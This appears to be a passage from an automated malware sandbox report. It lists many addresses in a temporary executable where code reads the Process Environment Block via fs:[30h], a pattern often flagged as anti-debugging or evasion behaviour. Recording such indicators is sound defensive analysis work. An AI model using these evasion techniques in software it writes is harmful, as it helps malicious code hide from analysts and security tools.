Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FA147 mov eax, dword ptr fs:[00000030h]	2_2_338FA147
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339D3157 mov eax, dword ptr fs:[00000030h]	2_2_339D3157
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339D3157 mov eax, dword ptr fs:[00000030h]	2_2_339D3157
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339D3157 mov eax, dword ptr fs:[00000030h]	2_2_339D3157
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393415F mov eax, dword ptr fs:[00000030h]	2_2_3393415F
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3399314A mov eax, dword ptr fs:[00000030h]	2_2_3399314A
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3399314A mov eax, dword ptr fs:[00000030h]	2_2_3399314A
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3399314A mov eax, dword ptr fs:[00000030h]	2_2_3399314A
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3399314A mov eax, dword ptr fs:[00000030h]	2_2_3399314A
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339D5149 mov eax, dword ptr fs:[00000030h]	2_2_339D5149
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33906179 mov eax, dword ptr fs:[00000030h]	2_2_33906179
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3395717A mov eax, dword ptr fs:[00000030h]	2_2_3395717A
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3395717A mov eax, dword ptr fs:[00000030h]	2_2_3395717A
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FA093 mov ecx, dword ptr fs:[00000030h]	2_2_338FA093
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339D4080 mov eax, dword ptr fs:[00000030h]	2_2_339D4080
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339D4080 mov eax, dword ptr fs:[00000030h]	2_2_339D4080
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339D4080 mov eax, dword ptr fs:[00000030h]	2_2_339D4080
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339D4080 mov eax, dword ptr fs:[00000030h]	2_2_339D4080
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339D4080 mov eax, dword ptr fs:[00000030h]	2_2_339D4080
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339D4080 mov eax, dword ptr fs:[00000030h]	2_2_339D4080
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339D4080 mov eax, dword ptr fs:[00000030h]	2_2_339D4080
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FC090 mov eax, dword ptr fs:[00000030h]	2_2_338FC090
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339D50B7 mov eax, dword ptr fs:[00000030h]	2_2_339D50B7
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339400A5 mov eax, dword ptr fs:[00000030h]	2_2_339400A5
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339BB0AF mov eax, dword ptr fs:[00000030h]	2_2_339BB0AF
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339AF0A5 mov eax, dword ptr fs:[00000030h]	2_2_339AF0A5
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339AF0A5 mov eax, dword ptr fs:[00000030h]	2_2_339AF0A5
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339AF0A5 mov eax, dword ptr fs:[00000030h]	2_2_339AF0A5
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339AF0A5 mov eax, dword ptr fs:[00000030h]	2_2_339AF0A5
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339AF0A5 mov eax, dword ptr fs:[00000030h]	2_2_339AF0A5
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339AF0A5 mov eax, dword ptr fs:[00000030h]	2_2_339AF0A5
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339AF0A5 mov eax, dword ptr fs:[00000030h]	2_2_339AF0A5
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3391B0D0 mov eax, dword ptr fs:[00000030h]	2_2_3391B0D0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FB0D6 mov eax, dword ptr fs:[00000030h]	2_2_338FB0D6
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FB0D6 mov eax, dword ptr fs:[00000030h]	2_2_338FB0D6
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FB0D6 mov eax, dword ptr fs:[00000030h]	2_2_338FB0D6
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FB0D6 mov eax, dword ptr fs:[00000030h]	2_2_338FB0D6
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393D0F0 mov eax, dword ptr fs:[00000030h]	2_2_3393D0F0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393D0F0 mov ecx, dword ptr fs:[00000030h]	2_2_3393D0F0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338F90F8 mov eax, dword ptr fs:[00000030h]	2_2_338F90F8
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338F90F8 mov eax, dword ptr fs:[00000030h]	2_2_338F90F8
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338F90F8 mov eax, dword ptr fs:[00000030h]	2_2_338F90F8
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338F90F8 mov eax, dword ptr fs:[00000030h]	2_2_338F90F8
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FC0F6 mov eax, dword ptr fs:[00000030h]	2_2_338FC0F6
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33925004 mov eax, dword ptr fs:[00000030h]	2_2_33925004
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33925004 mov ecx, dword ptr fs:[00000030h]	2_2_33925004
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33908009 mov eax, dword ptr fs:[00000030h]	2_2_33908009
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FD02D mov eax, dword ptr fs:[00000030h]	2_2_338FD02D
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33901051 mov eax, dword ptr fs:[00000030h]	2_2_33901051
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33901051 mov eax, dword ptr fs:[00000030h]	2_2_33901051
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339D505B mov eax, dword ptr fs:[00000030h]	2_2_339D505B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33930044 mov eax, dword ptr fs:[00000030h]	2_2_33930044
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33907072 mov eax, dword ptr fs:[00000030h]	2_2_33907072
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33906074 mov eax, dword ptr fs:[00000030h]	2_2_33906074
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33906074 mov eax, dword ptr fs:[00000030h]	2_2_33906074
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339A9060 mov eax, dword ptr fs:[00000030h]	2_2_339A9060
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33931796 mov eax, dword ptr fs:[00000030h]	2_2_33931796
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33931796 mov eax, dword ptr fs:[00000030h]	2_2_33931796
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3397E79D mov eax, dword ptr fs:[00000030h]	2_2_3397E79D
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3397E79D mov eax, dword ptr fs:[00000030h]	2_2_3397E79D
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3397E79D mov eax, dword ptr fs:[00000030h]	2_2_3397E79D
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3397E79D mov eax, dword ptr fs:[00000030h]	2_2_3397E79D
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3397E79D mov eax, dword ptr fs:[00000030h]	2_2_3397E79D
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3397E79D mov eax, dword ptr fs:[00000030h]	2_2_3397E79D
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3397E79D mov eax, dword ptr fs:[00000030h]	2_2_3397E79D
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3397E79D mov eax, dword ptr fs:[00000030h]	2_2_3397E79D
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3397E79D mov eax, dword ptr fs:[00000030h]	2_2_3397E79D
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339DB781 mov eax, dword ptr fs:[00000030h]	2_2_339DB781
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339DB781 mov eax, dword ptr fs:[00000030h]	2_2_339DB781
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339D17BC mov eax, dword ptr fs:[00000030h]	2_2_339D17BC
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339007A7 mov eax, dword ptr fs:[00000030h]	2_2_339007A7
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339CD7A7 mov eax, dword ptr fs:[00000030h]	2_2_339CD7A7
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339CD7A7 mov eax, dword ptr fs:[00000030h]	2_2_339CD7A7
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339CD7A7 mov eax, dword ptr fs:[00000030h]	2_2_339CD7A7
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339BF7CF mov eax, dword ptr fs:[00000030h]	2_2_339BF7CF
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339077F9 mov eax, dword ptr fs:[00000030h]	2_2_339077F9
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339077F9 mov eax, dword ptr fs:[00000030h]	2_2_339077F9
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392E7E0 mov eax, dword ptr fs:[00000030h]	2_2_3392E7E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339037E4 mov eax, dword ptr fs:[00000030h]	2_2_339037E4
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339037E4 mov eax, dword ptr fs:[00000030h]	2_2_339037E4
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339037E4 mov eax, dword ptr fs:[00000030h]	2_2_339037E4
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339037E4 mov eax, dword ptr fs:[00000030h]	2_2_339037E4
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339037E4 mov eax, dword ptr fs:[00000030h]	2_2_339037E4
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339037E4 mov eax, dword ptr fs:[00000030h]	2_2_339037E4
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339037E4 mov eax, dword ptr fs:[00000030h]	2_2_339037E4
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FB705 mov eax, dword ptr fs:[00000030h]	2_2_338FB705
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FB705 mov eax, dword ptr fs:[00000030h]	2_2_338FB705
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FB705 mov eax, dword ptr fs:[00000030h]	2_2_338FB705
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FB705 mov eax, dword ptr fs:[00000030h]	2_2_338FB705
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390471B mov eax, dword ptr fs:[00000030h]	2_2_3390471B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390471B mov eax, dword ptr fs:[00000030h]	2_2_3390471B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339BF717 mov eax, dword ptr fs:[00000030h]	2_2_339BF717
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390D700 mov ecx, dword ptr fs:[00000030h]	2_2_3390D700
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339C970B mov eax, dword ptr fs:[00000030h]	2_2_339C970B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339C970B mov eax, dword ptr fs:[00000030h]	2_2_339C970B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392270D mov eax, dword ptr fs:[00000030h]	2_2_3392270D
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392270D mov eax, dword ptr fs:[00000030h]	2_2_3392270D
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392270D mov eax, dword ptr fs:[00000030h]	2_2_3392270D
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33929723 mov eax, dword ptr fs:[00000030h]	2_2_33929723
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33922755 mov eax, dword ptr fs:[00000030h]	2_2_33922755
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33922755 mov eax, dword ptr fs:[00000030h]	2_2_33922755
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33922755 mov eax, dword ptr fs:[00000030h]	2_2_33922755
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33922755 mov ecx, dword ptr fs:[00000030h]	2_2_33922755
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33922755 mov eax, dword ptr fs:[00000030h]	2_2_33922755
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33922755 mov eax, dword ptr fs:[00000030h]	2_2_33922755
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339AE750 mov eax, dword ptr fs:[00000030h]	2_2_339AE750
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33933740 mov eax, dword ptr fs:[00000030h]	2_2_33933740
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF75B mov eax, dword ptr fs:[00000030h]	2_2_338FF75B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF75B mov eax, dword ptr fs:[00000030h]	2_2_338FF75B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF75B mov eax, dword ptr fs:[00000030h]	2_2_338FF75B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF75B mov eax, dword ptr fs:[00000030h]	2_2_338FF75B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF75B mov eax, dword ptr fs:[00000030h]	2_2_338FF75B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF75B mov eax, dword ptr fs:[00000030h]	2_2_338FF75B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF75B mov eax, dword ptr fs:[00000030h]	2_2_338FF75B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF75B mov eax, dword ptr fs:[00000030h]	2_2_338FF75B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF75B mov eax, dword ptr fs:[00000030h]	2_2_338FF75B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393174A mov eax, dword ptr fs:[00000030h]	2_2_3393174A
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33930774 mov eax, dword ptr fs:[00000030h]	2_2_33930774
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33904779 mov eax, dword ptr fs:[00000030h]	2_2_33904779
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33904779 mov eax, dword ptr fs:[00000030h]	2_2_33904779
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33912760 mov ecx, dword ptr fs:[00000030h]	2_2_33912760
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33941763 mov eax, dword ptr fs:[00000030h]	2_2_33941763
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33941763 mov eax, dword ptr fs:[00000030h]	2_2_33941763
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33941763 mov eax, dword ptr fs:[00000030h]	2_2_33941763
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33941763 mov eax, dword ptr fs:[00000030h]	2_2_33941763
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33941763 mov eax, dword ptr fs:[00000030h]	2_2_33941763
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33941763 mov eax, dword ptr fs:[00000030h]	2_2_33941763
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33908690 mov eax, dword ptr fs:[00000030h]	2_2_33908690
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3398C691 mov eax, dword ptr fs:[00000030h]	2_2_3398C691
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33910680 mov eax, dword ptr fs:[00000030h]	2_2_33910680
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33910680 mov eax, dword ptr fs:[00000030h]	2_2_33910680
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33910680 mov eax, dword ptr fs:[00000030h]	2_2_33910680
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33910680 mov eax, dword ptr fs:[00000030h]	2_2_33910680
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33910680 mov eax, dword ptr fs:[00000030h]	2_2_33910680
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33910680 mov eax, dword ptr fs:[00000030h]	2_2_33910680
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33910680 mov eax, dword ptr fs:[00000030h]	2_2_33910680
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33910680 mov eax, dword ptr fs:[00000030h]	2_2_33910680
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33910680 mov eax, dword ptr fs:[00000030h]	2_2_33910680
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33910680 mov eax, dword ptr fs:[00000030h]	2_2_33910680
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33910680 mov eax, dword ptr fs:[00000030h]	2_2_33910680
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33910680 mov eax, dword ptr fs:[00000030h]	2_2_33910680
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339BF68C mov eax, dword ptr fs:[00000030h]	2_2_339BF68C
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339C86A8 mov eax, dword ptr fs:[00000030h]	2_2_339C86A8
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339C86A8 mov eax, dword ptr fs:[00000030h]	2_2_339C86A8
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392D6D0 mov eax, dword ptr fs:[00000030h]	2_2_3392D6D0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339CA6C0 mov eax, dword ptr fs:[00000030h]	2_2_339CA6C0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339006CF mov eax, dword ptr fs:[00000030h]	2_2_339006CF
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3397C6F2 mov eax, dword ptr fs:[00000030h]	2_2_3397C6F2
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3397C6F2 mov eax, dword ptr fs:[00000030h]	2_2_3397C6F2
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338F96E0 mov eax, dword ptr fs:[00000030h]	2_2_338F96E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338F96E0 mov eax, dword ptr fs:[00000030h]	2_2_338F96E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390C6E0 mov eax, dword ptr fs:[00000030h]	2_2_3390C6E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339056E0 mov eax, dword ptr fs:[00000030h]	2_2_339056E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339056E0 mov eax, dword ptr fs:[00000030h]	2_2_339056E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339056E0 mov eax, dword ptr fs:[00000030h]	2_2_339056E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339266E0 mov eax, dword ptr fs:[00000030h]	2_2_339266E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339266E0 mov eax, dword ptr fs:[00000030h]	2_2_339266E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33993608 mov eax, dword ptr fs:[00000030h]	2_2_33993608
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33993608 mov eax, dword ptr fs:[00000030h]	2_2_33993608
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33993608 mov eax, dword ptr fs:[00000030h]	2_2_33993608
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33993608 mov eax, dword ptr fs:[00000030h]	2_2_33993608
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33993608 mov eax, dword ptr fs:[00000030h]	2_2_33993608
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33993608 mov eax, dword ptr fs:[00000030h]	2_2_33993608
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392D600 mov eax, dword ptr fs:[00000030h]	2_2_3392D600
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392D600 mov eax, dword ptr fs:[00000030h]	2_2_3392D600
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339BF607 mov eax, dword ptr fs:[00000030h]	2_2_339BF607
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393360F mov eax, dword ptr fs:[00000030h]	2_2_3393360F
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339D4600 mov eax, dword ptr fs:[00000030h]	2_2_339D4600
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33900630 mov eax, dword ptr fs:[00000030h]	2_2_33900630
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33930630 mov eax, dword ptr fs:[00000030h]	2_2_33930630
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33905622 mov eax, dword ptr fs:[00000030h]	2_2_33905622
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33905622 mov eax, dword ptr fs:[00000030h]	2_2_33905622
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33907623 mov eax, dword ptr fs:[00000030h]	2_2_33907623
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339AD62C mov ecx, dword ptr fs:[00000030h]	2_2_339AD62C
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339AD62C mov ecx, dword ptr fs:[00000030h]	2_2_339AD62C
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339AD62C mov eax, dword ptr fs:[00000030h]	2_2_339AD62C
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FD64A mov eax, dword ptr fs:[00000030h]	2_2_338FD64A
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FD64A mov eax, dword ptr fs:[00000030h]	2_2_338FD64A
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33935654 mov eax, dword ptr fs:[00000030h]	2_2_33935654
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390965A mov eax, dword ptr fs:[00000030h]	2_2_3390965A
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390965A mov eax, dword ptr fs:[00000030h]	2_2_3390965A
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393265C mov eax, dword ptr fs:[00000030h]	2_2_3393265C
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393265C mov ecx, dword ptr fs:[00000030h]	2_2_3393265C
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393265C mov eax, dword ptr fs:[00000030h]	2_2_3393265C
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33903640 mov eax, dword ptr fs:[00000030h]	2_2_33903640
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3391F640 mov eax, dword ptr fs:[00000030h]	2_2_3391F640
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3391F640 mov eax, dword ptr fs:[00000030h]	2_2_3391F640
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3391F640 mov eax, dword ptr fs:[00000030h]	2_2_3391F640
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393C640 mov eax, dword ptr fs:[00000030h]	2_2_3393C640
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393C640 mov eax, dword ptr fs:[00000030h]	2_2_3393C640
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33900670 mov eax, dword ptr fs:[00000030h]	2_2_33900670
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942670 mov eax, dword ptr fs:[00000030h]	2_2_33942670
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942670 mov eax, dword ptr fs:[00000030h]	2_2_33942670
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338F7662 mov eax, dword ptr fs:[00000030h]	2_2_338F7662
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338F7662 mov eax, dword ptr fs:[00000030h]	2_2_338F7662
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338F7662 mov eax, dword ptr fs:[00000030h]	2_2_338F7662
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33913660 mov eax, dword ptr fs:[00000030h]	2_2_33913660
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33913660 mov eax, dword ptr fs:[00000030h]	2_2_33913660
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33913660 mov eax, dword ptr fs:[00000030h]	2_2_33913660
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393666D mov esi, dword ptr fs:[00000030h]	2_2_3393666D
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393666D mov eax, dword ptr fs:[00000030h]	2_2_3393666D
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393666D mov eax, dword ptr fs:[00000030h]	2_2_3393666D
